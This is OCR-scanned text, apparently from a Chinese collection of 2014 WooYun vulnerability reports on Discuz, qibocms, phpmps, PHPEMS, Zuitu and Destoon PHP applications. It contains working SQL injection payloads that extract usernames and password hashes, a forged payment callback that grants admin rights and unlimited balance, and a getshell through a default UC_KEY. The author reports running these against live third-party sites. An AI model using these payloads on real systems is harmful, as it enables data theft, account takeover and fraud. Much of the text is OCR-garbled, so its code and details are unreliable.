\MICROS ~2\¥C98\\ATL\ INCLUDE ; C : \PROGRA 2\MICROS ~2\VC98\\ INCLUDE ; C: \PROGR, 
\WCORAMECATNCT IME” “--with-evtra-lihe=t*iPracram Files {v8A)\Wiernenf: 


直接 就 可 以 了 。 
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当然 5 位 也 可 以 尝试 爆破 一 下 嘛 哈哈 。 


漏洞 证 明 


见 上 面 把 。 


修复 方案 

这 个 我 也 不 太 清 楚 了 你 们 自己 好 好 思考 思考 把 。 
这 个 文件 每 个 开源 的 系统 中 都 有 。 

每 个 都 要 修改 。 


WooYun-2014-71516 : Discuz 5.x 6.x 7.x 8j 4 
SQL 注入 漏洞 一 枚 


V 
漏洞 作者 : ' 雨 。 


来 源 : http://www.wooyun.org/bugs/wooyun-2014-071516 
简要 描述 


自从 补课 补 完了 MLA CHASER T o 睡觉 看 电视 看 小 说 。 唉 。 
得 开始 努力 学 习 考 大 学 T 


看 到 map 牛 发 了 几 个 dz7.2 的 也 看 到 还 在 更 新 我 也 就 看 了 看 前 台 注 入 一 枚 , 也 都 知 
道 如 果 Ucenter 和 DZ 在 一 个 裤 里 面 的 话 就 可 以 拿 到 UC_key 拿 到 uc_key 了 A 
后 nse i: 1R fal 3e 83 — NI o 


详细 说 明 

http://**.**.** **/Discuz/7.2/Discuz 7.2 SC. GBK zip 

刚 在 官网 下 的 这 个 。 

首先 说 一 下 这 洞 需要 有 权限 发 布 投票 才 行 刚 注册 的 会 员 是 不 能 发 布 投票 的 
我 看 了 下 默认 发 布 投票 需要 的 权限 需要 从 注册 会 员 开 始 才 有 发 布 投票 的 权限 


编辑 用 户 组 - 广 册 会 员 基本 设置 EEE 帖子 相关 ”附件 相关 ”道具 相关 ”注册 相关 OR: 


"SAXIS 

允许 发 起 活动 : 
图 是 oF 
允许 发 起 投票 
esos 选择 "是 "允许 在 论坛 发 布 抽 


允许 参与 投票 





回 注册 会 员 [50 ~ [200 2 


看 了 一 下 注册 会 员 所 需要 的 积分 是 50 分 
50 分 上 传 个 头像 做 个 任务 就 差不多 了 (所 以 狗 哥 这 不 算 限 制 条 件 把 ?) 


在 post.php 中 
从 263 行 开始 也 就 是 最 后 的 那 几 行 

if($action == 'newthread') { 

($forum['allowpost'] == -1) && showmessage('forum_access_disal- 
require_once DISCUZ ROOT.'./include/newthread.inc.php'; 

) elseif($action == 'reply') { 

($forum['allowreply'] == -1) && showmessage('forum_access_disa- 
require_once DISCUZ ROOT.'./include/newreply.inc.php'; 

) elseif($action == 'edit') { 

($forum['allowpost'] == -1) && showmessage('forum_access_disal- 
require_once DISCUZ_ROOT.'./include/editpost.inc.php'; 

} elseif($action == 'newtrade') { 

($forum['allowpost'] == -1) && showmessage('forum_access_disal- 
require_once DISCUZ_ROOT.'./include/newtrade.inc.php'; 

j 
站 于 
包含 了 这 么 多 文件 进来 我 找 了 这 个 文件 看 了 起 来 include/editpost.inc.php 
然后 在 include/editpost.inc.php 第 272 行 左右 





if($thread['special'] == 1 && ($alloweditpoll || $isorigauthor) && 
$pollarray = ''; 
$pollarray['options'] = $polloption; 
if($pollarray['options']) { 
if(count($pollarray['options']) > $maxpolloptic 
showmessage('post poll option toomany!'); 
j 
foreach($pollarray['options'] as $key => $value 
if(!trim($value)) { 
$db->query("DELETE FROM {$tablepre}pol- 


unset($pollarray['options'][$key]); 


} 
$polladd = ', special=\'1\''; 
MN 





foreach($pollarray['options'] as $key => $value) { 
这 里 直接 把 数组 中 的 key 带 入 到 了 delete 查 询 当 中 。 
再 来 看 一 下 dz 的 全 局 文件 


foreach(array(' COOKIE', ' POST', '_GET') as $ request) { 
foreach($$ request as $ key => $ value) { 


$ key(0) != ' ' && $$ key = daddslashes($ value); 


function daddslashes($string, $force = 0) { 
!defined('MAGIC QUOTES GPC') && define('MAGIC QUOTES GPC', get. 
if(!MAGIC QUOTES GPC || $force) { 
if(is array($string)) (1 
foreach($string as $key => $val) ( 
$string[$key] = daddslashes($val, $force); 
j 
) else { 


$string = addslashes($string); 


} 


return $string; 





II 
这 里 先 判断 了 gpc 是 否 开局 如 果 没 有 开局 就 用 addslashes 再 来 转 义 
这 里 对 数组 中 的 value 进 行 转 义 key 无 过 滤 。 

$db->query("DELETE FROM {$tablepre}polloptions WHERE polloptionid= 
一: 
所 以 再 进行 这 个 查询 的 时 候 我 们 就 可 以 引入 单 引 号 了 。 





在 执行 循环 之 前 有 一 个 条 件 
if($thread['special] == 1 && ($alloweditpoll || $isorigauthor) && lempty($polls)) 


ix  (Salloweditpoll || $isorigauthor) $isorigauthor 判 断 是 不 是 你 是 作者 如 果 你 编辑 
的 是 你 的 文章 的 话 肯定 是 true。 $polls 这 个 直接 就 可 以 控制 。 


$thread['special'] == 1 之 前 我 一 直 在 纠结 这 个 是 啥 东西 。。 


后 面 看 了 看 发 文章 的 时 候 的 代码 这 个 $thread['special] == 1 代表 的 就 是 发 布 的 是 投 
b o 


UN 


那 如 果 我 们 自己 发 布 一 个 投票 然后 再 编辑 就 可 以 进入 这 里 了 。 


| XXXXXXX 


选项 :每 行 填写 1 个 选项 最 多 可 填写 5 个 选项 





























[0 | |adasd 辣 多 选 投票 |1 
lo | adaed : i 
0 |dsad B NE 
[0 | [asdasd 回 投票 后 结果 可 见 
(0 [das 回 公开 投票 参与 人 
+ 增加 一 项 
Bn Tr i e Nd ae E m i i <? 
| B 3 PF 5 ks A 6 iu f ? 
|: E Ea i— Hide Free : (33 (y D: 表情 BR 附件 音乐 视频 Fash 代码 引用 
ads 
PA vau 


首先 发 布 一 个 投票 。 发 布 完 后 再 点 击 编辑 。 
然后 再 抓 一 下 包 。 
这 里 我 输出 了 一 下 
$polladd = ''; 
if($thread['special'] == 1 && ($alloweditpoll || $isor: 
$pollarray = ''; 
$pollarray['options'] = $polloption; 


var dump ($polloption);exit;//41& H 


| == E: 





ib PHP 常见 漏洞 


Go Cancel 和 >|" Target: http:/ /web " 
Request Response 





Params Headers Hex [ Raw | Headers | Hex 


POST /dz72/post.php?action =edit&extra =&editsubmit=yes &mod =| 
HTTP/1.1 






Content-Type: text/html 


Host: web array(6) ( 
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/ 20100101 [1]=> 

Firefox/ 12.0 string(5) "adasd" 
Accept: [2]= > 
text/html,application /xhtml-4xml,application /xml;q20.9,*/*;q20.8 1 string(5) "adasd" 
Accept-Language: zh-cn,zh;q20.8,en-us;q20.5,en;q2 0.3 [3]= > 
Accept-Encoding: gzip, deflate string(4) "dsad" 
Proxy- Connection: keep-alive [4]= > 

Referer: string(6) "asdasd" 
http://web/dz72/post.php?action =edit&fid 22&tid = 14&pid =14&page=1 [5] > 

Cookie: string(3) "das" 
ypu.auth =af7fC7daS5d072pB9UV OSAFuwwBbackxgBzgAlofLbkjN7hwV HM [6]= > 
eD1cqKEThPPgZxz3R5j 7jpRyYNFSUJxIxAw; ypu. cookietime- 2592000; i string(0) "" 


GDh anlinanecearniim — I: 1 





我 擦 一 看 竟然 已 经 有 值 了 ? 
在 这 里 我 本 来 已 经 准备 放弃 了 , 但 是 还 是 抱 着 试 一 试 的 态度 在 url 写 了 这 个 


POST 





HTTP/ 1.1 200 OK 
/dz72/post.phpraction =edit&extra = &editsubmit =yes &mod Date: Thu, 07 Aug 2014 18:01: 
TTP/ 1.1 Server: Apache/ 2.2.9 (APMServ; 
Host: web mod.ssl/2.2.9 OpenSSL/0.9.8F 
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/ 20100101 X-Powered -By: PHP/5.2.6 
Firefox/ 12.0 Content-Length: 40 
Accept: | Content-Type: text/html 
text/html,application /xhtml-4xml,application /xml;q 20.9,*/*;q20.8 
Accept-Language: zh-cn,zh;q 2 0.8,en-us;q 2 0.5,en;q 20.3 array(1) { 
Accept-Encoding: gzip, deflate ['yu'"]2» 
Proxy-Connection: keep-alive string(Q) "" 
Referer: H 








http:/ /web/dz72/post.php?action =edit&fid 22&tid = 14&pid 2 14&page-1 
发 现 还 是 可 以 控制 而 且 单 引 号 理 所 应 当 的 没有 被 转 义 。 
那 不 是 就 可 以 注入 了 吗 ? 构造 一 下 语句 。 


if(!trim($value)) { 


$db->query("DELETE FROM {$tablepre}pol- 
SSeS Sey 





为 这 里 数组 中 的 value 为 false 的 时 候 才 会 进去 
所 以 这 里 数组 的 value 我 们 就 不 写 
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ib PHP 常见 漏洞 


POST a [Table]polloptions WHERE A 
[dz72|post.php?action =edit&extra = &editsubmit 2yes &mod = &polloption[ polloptionid ='yu' and 
yu'+and+extractvalue(1,concat(0x5c,(select+concat(username, pas sword )+ extractvalue(1,concat(Ox5c,(select 
from+cdb_mem bers)))%23]= HTTP/ 1.1 concat(username, password) from 

Host: web [Mable]members) AND tid -'14'«br 


User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/ 20100101 
Firefox/ 12.0 <b>Error</b>: XPATH syntax error: 
Accept: 'Yadminbebf8c2bc4f 14a0e la7b60d63d 


text/html,application/xhtml+xml,application/xml;q 20.9,* /*;q 2 0.8 
Accept-Language: zh-cn,zh;q 20.8,en-us;q20.5,en;q 20.3 
Accept-Encoding: gzip, deflate 


Drasae Cannactian: kaanan aliva 


成 功 出 数据 。 





style= "Fanta dimi Verdana, Tahoma; 


fant cim 12m hackarauned: 





漏洞 证 明 





POST A [Table]polloptions WHERE A 
[dz72|post.php?action =edit&extra =&editsubmit 2yes &mod = &polloption[ polloptionid ='yu' and 
yu'+tand+extractvalue(1,concat(0xSc,(select+concat(username,password)+ 下 extractvalue(1,concat(0x5c,(select 
from+cdb_members))}%23]= HTTP/1.1 concat(username, password) from 

Host: web [Table]members)))#' AND tid -'14'«br 
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/ 20100101 

Firefox/ 12.0 <b>Error</b>: XPATH syntax error: 
Accept: 'Nadminbebf8c2bc4f14a0e la 7b60d 63d 
text/html,application /xhtml4-xml,application /xml;q 20.9,* /*;q 2 0.8 

Accept-Language: zh-cn,zh;q 20.8,en-us;q20.5,en;q 20.3 

Accept-Encoding: gzip, deflate style= "font- ey Verdana, Tahoma; 
Drasas Cannactian: kaan alia fant cimo 12m haekaraiund: 





修复 方案 
foreach($pollarray['options'] as $key => $value) { 
$key=addslashes($key); 


if('trim($value)) { 


$db->query("DELETE FROM {$tablepre}polloptions WHERE polloptionid-'$key' 
AND tid='$tid"); 


还 是 看 你 们 把 。 
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WooYun-2014-80875 : qibocms 地 方 门户 系统 ix 
入 #4(demo 测 试 ) 


e 
漏洞 作者 : ' 雨 。 V 

来 源 : http://www.wooyun.org/bugs/wooyun-2014-080875 
简要 描述 

offset 

详细 说 明 

在 zhuangxiu/job.php 中 


if(eregi("^([_0-9a-z]+)$",$job)){ 
require once(Mpath."inc/job/$job.php"); 
jelseif(eregi("^([ 0-9a-z]*)$",$action))( 


require once(Mpath."inc/job/$action.php"); 


包含 进来 


zhuangxiu\inc\job\post_img.php ¥ 


foreach( $photodb AS $key=>$value) { 
if (strlen($value)>4&&! eregi("(gif|jpg|png)$",$value)){ //X 


showerr(" 只 能 上 传 GIF, JPG, PNG 格 式 的 文件 ,你 不 能 上 传 此 文件 :$val 


} 
$num-0; 
foreach( $photodb AS $key=>$value ){ 
$titledb[$key]=filtrate($titledb[$key]); 
$value-trim($value); 
$value-filtrate($value); 
if($titledb[$key]>100) { 
showerr ("4a RAAF 507 RF"); 
j 
if(strlen($value)«4)( 
$db->query("DELETE FROM ^($ prejpic' WHERE pid='{$piddt 
jJelseif($piddb[$key])( 
$num++; 
$db->query("UPDATE ~{$ prejpic' SET name='{$titledb[$ke 
selseif ($value) { 
$num++; 


$db->query("INSERT INTO ~{$ _pre}pic’ ( “id , “fid , 


4 EN - 


UPDATE ($ pre}pic SET name="{$titledb[$key]}',imgurl="$value' WHERE 
pid='{$piddb[$key]}' 


注意 看 这 语句 。 $title 并 没有 初始 化 那么 结合 qibocms 的 全 局 机 制 那么 就 可 以 控制 





而 且 这 里 $titledb[$key] 如 果 我 们 提交 的 $titledb A FAH BAIS 那么 [$key] 就 成 了 读 
取 字 符 的 了 。 如 果 $key 为 0 那么 就 是 读 取 字 符 串 的 第 一 位 


如 果 我 们 提交 ' 被 qibocms 的 全 局 转 义 成 了 \ 那么 截取 第 一 位 就 是 \ 
就 能 吃 掉 一 个 单 引 号 了 。 然后 刚好 后 面 的 一 个 变量 可 控 。 

导致 了 可 以 注入 。 $value 虽然 结尾 限定 了 必须 为 jpg 

但 是 直接 注释 掉 后 面 的 就 行 了 。 


|INT vj æ= d$ SQLr XSS- Encryption" Encoding: Üther- 


d Load URL [ 121.0. 0. 1/dan/ qibodf/zhuangxiu/ job. php? erp-xxx&job-post img&act-edit&i d-1&photodb[]-xxx. pre tledb=’ i = 


) Split URL + 








» Execute 





C Enable Post data 
数据 库 连接 出 错 :UFDATE ‘qb_zhuangxiu_pic SET name=’ \’, imgurl=’xxx. jpg’ WHERE pid=’ xxx’ 





^ 
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'xxx. jpg 
WHERE pid=’xxx’’ at line 1 
1064 
x AN Ze f; ` 2 A > E 
可 以 看 到 截取 的 \ 吃 掉 了 单 引 号 造成 了 注入 。 
构造 一 下 。 
dj Load URL | 127. 0. D. 1/dan/ qi bod£/ zhuangxiu/ job. php?. erpzixx&jobzpost, imghact-edi t&i d-l&photodb[]-and (select 1 from (select count (Œ), concat ((select a) = 
th i user ()), floor (rand (0)*2))x from information schema. tables group by x)a) %23. jpg&piddb[]-xxx&ti tledb-" 
d Split URL F 


[C] Enable Post data [] Enable Referrer 


数据 库 连 接 出 错 :UFDATE qb_zhuangxiu_pic SET name=’ V ,imgurl-' and (select 1 from (select count (*), concat ( (select user ()), floor (rand(0)*2))x from a 
information schema. tables group by x)a)#. jpg? WHERE pid=’ xxx’ F 





uplicate entry 'rootGlocalhostl' for key ”group_key” 
1062 





成 功 出 数据 。 


测试 demo: 


imi v= v ou ado% rncryption* rnncoaing' utnery 





三 Load URL http: //lifeS. gibosoft. com/zhuangxiu/ job. php?_erp=xxxj ob=post_imghact=edi thi d=14photodb[]=asd) 823. jpg&pi ddb[]-xxx&titledb- = 
) Split URL + 





, Execute 





[C Enable Post data [ Enable Referrer 
数据 库 和 连接 出 错 :UPDATE life5 zhuangxiu pic SET name-' V, imgurl=’ asd)&. jpg! WHERE pid=’ xxx’ A 
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'asd)&. jpg WHERE pid=’ xxx’ at 


line 1 
1064 





网 页 正在 跳 转 当中 , WHR... 
HER 
nA EID SS SEBUB BR, 请 点 击 这 里 


成 功 报错 直接 update column 就 出 数据 了 。 


论 PHP 常见 漏洞 


漏洞 十 明 


—- = m —— C ——Á—— MÀ 





三 Load URL 127.0. 0. 1/dan/qibodf/zhuangxiu/ job. php? erp-xxx&job-post img&act-edit&id-l&photodb[]-and (select 1 from 


(select count (k), concat ((select - 
B sut user ), floor (rand (0)42))x from information scheme. tables group by x)«)323. ips&piddb[]-xxx&ti tledb-' 
it URL 


^?) Execute 








[C] Enable Post data  [ ] Enable Referrer 


数据 库 连接 出 错 :UFDATE "qb zhuangxiu pic SET name=’ V ,imgurl-' and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from ^| 
information schema. tables group by x)a)#. jpg’ WHERE pid-'xxx' T 





uplicate entry ’root@localhost1’ for key 'group key 
1062 s 





修复 方案 
判断 是 不 是 数组 。 
如 果 是 数组 的 话 再 进行 这 样 的 操作 。 


WooYun-2014-80875 : qibocms 地 方 门 户 系统 注入 #4(demo 测 试 ) 173 


WooYun-2014-60159 : phpmps 注入 (可 修改 其 他 
A PAS, el UI) 


z 
漏洞 作者 : ' 雨 。 V 

来 源  http://www.wooyun.org/bugs/wooyun-2014-060159 
简要 描述 

IEE RAT o 

详细 说 明 

在 api/uc.php 中 


define('IN PHPMPS', true); 
define('UC CLIENT VERSION', '1.5.0'); //note UCenter 版 本 标识 


define('UC CLIENT RELEASE', '20081031'); 


define('API DELETEUSER', 1); 
define('API RENAMEUSER', 1); 
define('API GETTAG', 1); 
define('API SYNLOGIN', 1); 
define('API SYNLOGOUT', 1); 


define('API UPDATEPW', 1); 


define('API UPDATEBADWORDS', 1); 


define('API UPDATEHOSTS', 1); 


define('API UPDATEAPPS', 1); 


define('API UPDATECLIENT', 1); 
define('API UPDATECREDIT', 0); 


define('API GETCREDITSETTINGS', 0); 


//note 用 户 删除 API 接口 开关 
//note 用 户 改名 API 接口 开关 
//note 获取 标签 API 接口 开关 
//note 同步 登录 API 接口 开关 
//note 同步 登 出 API 接口 开关 
//note 更 改 用 户 密码 开关 
//note 更 新 关键 字 列 表 开关 
//note 更 新 域名 解析 缓存 开关 
//note 更 新 应 用 列表 开关 
//note 更 新 客户 端 缓存 开关 


//note 更 新 用 户 积分 开关 


//note 向 UCenter 提供 积分 设置 


define('API GETCREDIT', 0); //note 获取 用 户 的 某 项 积分 开关 
define('API UPDATECREDITSETTINGS', 0); //note 更 新 应 用 积分 设置 开关 
define('API RETURN SUCCEED', '1'); 
define('API RETURN FAILED', '-1'); 
define('API RETURN FORBIDDEN', '-2'); 
//note 普通 的 http 通知 方式 
if(!defined('IN UC')) 
{ 
error reporting(0); 
set magic quotes runtime(0); 
defined('MAGIC QUOTES GPC') || define('MAGIC QUOTES GPC', get r 
include '../include/common.php'; 
include "../incelude/uc. ine. php’; 
$ DCACHE = $get = $post = array(); 
$code = @$_GET['code']; 
parse str( authcode($code, 'DECODE', UC KEY), $get); 
if(MAGIC QUOTES GPC) { 
$get - stripslashes($get); 
j 
$action - $get['action']; 
require once '../uc client/lib/xml.class.php'; 
$post - xml unserialize(file get contents('php://input')); 
nne ——————— 4 
UC KEY XA phpmps » 官网 的 也 如 此 。 
为 1 的 我 们 都 可 以 调用 。 
那 就 来 调用 这 个 把 





function updatepw($get, $post) { 
global $db,$table; 
if(!API UPDATEPW) { 


return API RETURN FORBIDDEN; 


j 


$username $get['username']; 


$password - $get['password']; 
$newpw = md5($password); 
$db->query("UPDATE {$table}member SET password-'$newpw' WHI 


return API RETURN SUCCEED; 


a -— 





这 里 是 个 update 的 语句 所 以 我 们 可 以 更 改 其 他 用 户 的 密码 。 
然后 我 们 自己 生成 一 个 加 密 的 注入 语句。。。 


Hey i] HE BH 


测试 demo。 


INT |æ @ SQL XSS- Encryption Encoding” Other- 


~@ LoadURL http://www.phpmps.com/demo/api/uc.php?code- 9583 5 
| E Split URL | %2B%2FfTQis8XxXpCRMMIgoje%2BZo%2Bf1AMIQLESYMUOS26XZwMNQYe%2FFWKOY6FosNe3]8qvy9lxmpZzzGPmPF6W2lbWySYMDTUvYEno%o2FA%o2Bh95EzpiLvQO83EKRuab | 二 
pvnli7tb]g6FcmkKWwVcL3at9uHVTuUS80PSiDgTX3cV0O9%2FCXw]rl13czF96IXM1XB6IS8Mo%2BV6N24FsLIXCSLKpPjgHPDesSqcN8m2%2BtmUo%2FoT6ITYXo%o2F65SBp6TG 

^» Execute OXZBGCPOYSOsUbySEST9zQj69/o2FW 1848BuY YPGN3SGbkGOZALBtdsO6MY %2FISdn72WufDDWN3HCcY 4F2XnHdl1aEZ2C %e2BgK arSBmyzwPIszmn%2B2BRjOziFSEUSH 
k S1QpySzifFamqnDwED4FOudpwi4t7Nw40N2U%2FsLEl%o2FUOY V fw 


[E] Enable Post data Enable Referrer 


NySQL server error report:Array ( [0] => Array ( [message] => NySQL Query Error ) [1] => Array ( [sql] => UPDATE 
demo member SET password-' ddld8cd98f00b204e9800998ecf8427e' WHERE username= a and(select 1 from(select 

count (*), concat (floor (rand(0)*2), 0x3a, (select (select (SELECT concat(user()) limit 0,1))from 

information schema. tables limit 0,1))x from information schema. tables group by x)a) and 1-14 ) [2] => Array ( 
[error] => Duplicate entry '1:a112608431081o0calhost' for key 1 ) [3] => Array ( [errno] => 1062 ) ) 





www.wooyun.org 


4A aue 
修复 方案 


WooYun-2014-61135 : PHPEMS (在 线 考 试 系统 ) 
设计 缺陷 Getshell 一 枚 (官网 已 shell) 


漏洞 作者 I ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-061135 


简要 描述 
称 是 最 好 用 的 开源 php 考 试 系统 ? 果断 来 看 看 。 


号 称 是 
已 拿 下 官网 。 
详细 说 明 


PHPEMS 整 合 了 uc ° 
在 api/config.inc.php 中 


define('UC CONNECT', 'mysql'); 

define('UC DBHOST', 'localhost'); 
define('UC DBUSER', 'root'); 

define('UC DBPW', 'root'); 

define('UC DBNAME', 'ucenter16'); 
define('UC DBCHARSET', 'utf8'); 

define('UC DBTABLEPRE', ''"ucenteri6' .uc '); 
define('UC DBCONNECT', '0'); 


define('UC KEY', '1234567890'); 


在 不 整合 uc 的 话 UC. KEY 默认 就 为 1234567890 
http://**.**.**.**/bugs/wooyun-2014-048137 
利用 UC_KEY Getshell » 测试 一 下 官网 。 


漏洞 证明 


mD:\ApmServ\PHP>php uc .php 
HTTP/1.1 266 OK 
Server: nginx 

本 Date: Sat。17 Mav 2014 096:36:47 el S 
Content-Type: text/html 
Transfer-Encoding: chunked 
Connection: close 
Vary: Accept-Encoding 
m—Powered—By: PHP/5.2.9 





1 
1 
a 


HTTP/1.1 266 OK 

Seruer: nginx 

Date: Sat. 17 May 2014 66:36:47 GMT 
Content-Type: text/html 
Transfer-Encoding: chunked 
Connection: close 

Nary: Accept-Encoding 

m—Powered—By: PHP/5.2.9 


无 破坏 ,谢谢 。 


WooYun-2014-58479 : 最 土 团 购 注 入 一 枚 可 直接 
提升 自己 为 管理 有 无限 刷 钱 。 


Y 
— M i 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-058479 


简要 描述 

最 土 团购 在 我 印象 中 用 得 还 是 有 把 。 

至 少 我 自己 都 遇 到 过 几 次 了 。 

前 段 时 间 挖 的 了 。 本 来 想 留 着 自己 玩 的 。 

可 是 留 着 留 着 也 没 用 过 , 忘记 了 自己 早已 不 摘 站 。 


还 是 发 出 来 把 。 

注入 可 提升 自己 为 管理 & 给 自己 刷 100 万 可 好 ? 
无 视 GPC 。 

详细 说 明 


在 orderchinabank/notify.php 中 


$key = $INI['chinabank']['sec']; 
$v_oid = trim($ POST['v oid']); // 商户 发 送 的 V_oid 定 单 编号 
$v_pmode = trim($ POST['v pmode']); // 支付 方式 (FHF) 
$v_pstatus = trim($ POST['v pstatus']); // 支 付 状态 :20 成 功 , 30 XX 
$v pstring = trim($ POST['v pstring']);  // 支付 结果 信息 
$v amount = trim($ POST['v amount']); // 订单 实际 支付 金额 
$v moneytype = trim($_POST['v_moneytype']); // 订 单 实 际 支付 币 种 
$remark1 = trim($ POST['remarki' ]); // 备 注 字 段 1 
$remark2 = trim($_POST['remark2' ]); // 备 注 字 段 2 
$v_md5str = trim($_POST['v_md5str' ]);  // 拼 凑 后 的 MD5 校 验 值 
/* 重新 计算 md5 的 值 */ 
$text = "{$v_oid}{$v_pstatus}{$v_amount}{$v_moneytype}{$key}"; 
$md5string = strtoupper(md5($text)); 
/* 判断 返回 信息 ， 如 果 支 付 成 功 ， 并 且 支 付 结果 可 信 ， 则 做 进一步 的 处 理 */ 
if ($v_md5str == $md5string) ( 
list($ , $order_id, $city_id, $ ) = explode('-', $v_oid, 4); 
if($v_pstatus=="20") ( 
/* charge */ 
if ($ == 'charge' ) { 
@list($_, $user_id, $create_time, $ ) = explode('-', $ 
ZFlow: :CreateFromCharge($v_amount, $user_id, $create_t: 


die('ok'); 


[um SSS ey 
key 是 空 的 不 用 管 他 。 只 是 一 点 点 的 验证 。 MD5 相 等 可 好 , 然后 把 v_oid 用 来 切 


F] o 





然后 带 入 CreateFromCharge 


static public function CreateFromCharge($money, $user_id, $time, $ser\ 
global $option_service; 
if (!$money || !$user id || !$time) return 0; 
$pay id = "charge-{$user_id}-{$time}"; 
$pay = Table::Fetch('pay', $pay_id); 
if ( $pay ) return 0; 
$order id = ZOrder::CreateFromCharge($money, $user_id, $time, 
if (!$order_id) return 0; 
//insert pay record 
$pay = array( 
'id' => $pay_id, 
'vid' => $trade no, 
'order id' => S$order id, 
'bank' => $option service[S$service], 
'currency' => 'CNY', 
'money' => $money, 
'service' => $service, 
'create time' => $time, 
); 
DB::Insert('pay', $pay); 
ZCredit::Charge($user id, $money); 
/ /end// 
//update user money; 
$user - Table::Fetch('user', $user id); 
Table::UpdateCache('user', $user id, array( 


'money' => array( "money + {$money}" ), 


)); 


$u = array( 
'user_id' => $user_id, 
'admin_id' => 0, 
'money' => $money, 
'direction' => 'income', 
'action' => 'charge', 
'detail id' => $pay id, 
'create time' => $time, 
); 


return DB::Insert('flow', $u); 


[EEE] 





这 里 有 一 个 insert 语句 Fe — “update 4] » 
insert 里 面 的 都 被 单 引 号 了 。 而 且 如 果 我 们 提交 单 引 号 的 话 还 会 被 转 义 。 


Table: :UpdateCache('user', $user_id, array( 


'money' => array( "money + {$money}" ), 


)); 


这 个 update $money 是 没有 单 引 号 的 。 
然后 带 入 查询 BAM Pi a © 
由 于 管理 和 用 户 都 是 在 user 表 里 是 通过 manager 这 个 column 用 来 判断 是 否 为 管理 
员 


我 们 给 我 们 自己 的 用 户 的 manager update 成 y 即 可 成 为 管理 员 。 
UPDATE user SET money =money + asd WHERE id ='88' 
执行 的 语句 如 此 。 我 们 构造 一 下 语句 。 


漏洞 证 明 


P Execute 


Enable Post data Enable Referrer 
Post data v_oid=charge-91-1-5&v_pstatus=20&v_amount=1000000000,manager=1 where mobile=18888888887#8&v_md5str=CEl 


www.wooyun.org 


1 i admin@gqq.com i | 2046be842fØ62a2bi3efððc 
S8b55927F NULL 13594589654 NULL i 2.66 i 8 
NULL NULL i Y y i 
127.0.0.1 | 1398425453 i 1398425453 i NULL 


i 2 | xiaoyulqgq.com i NULL ! NULL | 2046hbe842f0962a2hbl3efgoc 
S8b55927F i NULL i i: 18888888887 NULL | 99999999.99 i 8 
| NULL | NULL i i Y y | 8808fe6aíc796bc4e9 
77185d8072a99£5b i NULL i 127.0.0.1 i 1398425486 i 1398425486 i NULL 





成 功 提升 。 
百度 随便 找 了 个 站 测试 。 


é op gentuangou.com aT] 4- r Bis m |- 
B ihid |^ EasyTak Administrato.. $ 90sec 信 息 安全 小 组 KA Exploit-DB 漏 洞 公布 六 EasyTalk Administrato... IgM 1337Day £} 90secTools [S] 国内 SeBug Y: Reverse-IP » 
INT = $9 SQL” XSS- Encryption" Encoding: Other- 

x) Load URL 

Split URL + 
^) Execute 


Enable Post data Enable Referrer 


团购 列表 ”团购 达 人 


NF —— ———— 
| 我 的 订单 | AIA | 账户 信息 | 


= 
账户 设置 帐户 余额 我 的 问答 FINSE 收 货 地址 


您 的 账户 余额 ，¥99999999.99 








我 的 优惠 卷 


WWW.WOooyun.org 


无 限 刷 钱 


ib PHP 常见 漏洞 


€ 0 四 ^'ww.gentuangou.com/manage/misc/index.php 


mi wc | N P) | 02 |-| | 





访问 最 多 (©) EasyTalk Administrato.. $ 90sec 信 息 安全 小 姐 KI Exploit-D8 漏 洞 公 布 


IT [v] = e sQL xss Encryption” Encoding- Other- 
x Load URL  |http://www.gentuangou.com/manage/index.php 
Q Split URL 
») Execute 


(73 EasyTalk Administrato... Ell 1337Day { ; 90secTools [S] 国内 SeBug $ Rever. 





[E] Enable Post data [E] Enable Referrer 


精品 团购 每 一 天 
zuitu.com 


Bs 


Bi 


成 功 提 升 。 


WooYun-2014-58479 : 最 土 团购 注 





入 一 枚 可 直接 提 


类 别 We 积分 FH RA 


www.wooyun.org 


升 自己 为 管理 & 无 限 刷 


WooYun-2014-55026 : Destoon Sql7£ A “#4 
2 (有 条 件 ) 


漏洞 作者 I ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-055026 


简要 描述 


过 滤 不 严 。 


详细 说 明 

上 次 是 alipay 这 次 来 个 paypal 的 。 当然 tenpay 也 有 这 洞 
paypal 和 tenpay 的 一 起 说 了 。 
api\pay\paypal\notify.php t 


require '../../../common.inc.php'; 

$_POST = $_DPOST; 

if(!$_POST) exit('fail'); 

$bank = 'paypal'; 

$PAY = cache_read('pay.php'); 

if(!$PAY[$bank]['enable']) exit('fail'); // 得 开启 这 种 支付 方式 。 


if(!$PAY[$bank]['partnerid']) exit('fail'); 


$item_name = $ POST['item name']; 
$item number - $ POST['item number']; 


$payment status = $ POST['payment status']; 


$payment amount $ POST['mc gross']; 
$payment currency = $ POST['mc currency']; 
$txn_id = $_POST['txn_id']; 

$receiver_email = $_POST['receiver_email']; 
$payer_email = $_POST['payer_email']; 
$charge_status = 0; 


$sql="SELECT * FROM {$DT_PRE}finance_charge WHERE itemid='$item_nur 
q 


$r = $db->get_one("SELECT * FROM {$DT_PRE}finance_charge WHERE iter 
El I dete 





paypal 无 过 滤 。 连 验证 都 没 验证 。 


直接 注入 


tenpay 


if($resHandler->isTenpaySign()) { 
/ / 38i dn id 
$notify id = $resHandler-»getParameter("notify id"); 
// 通 过 通知 ID 查询 ， 确 保 通知 来 至 财 付 通 
// 创 建 查询 请 求 
$queryReq = new RequestHandler(); 
$queryReq->init(); 
$queryReq->setKey($key); 
$queryReq->setGateUrl("https://**.**.**.**/gateway/simpleve 
$queryReq->setParameter("partner", $partner); 
$queryReq->setParameter("notify_id", $notify_id); 
// 通 信 对 象 
BEE) 


tenpay 里 面 多 了 个 验证 不 过 可 以 轻松 通过 。、 





$transaction_id = $resHandler->getParameter("transaction_id"); 
// BB, ADA Bt 
$total fee = $resHandler-»getParameter("total fee" 
// 如 果 有 使 用 折扣 券 ，discount 有 值 ，total fee+discount= 原 请 求 的 total_f 


$discount = $resHandler-»getParameter("discount"); 


// 处 理 数据 库 逻 辑 

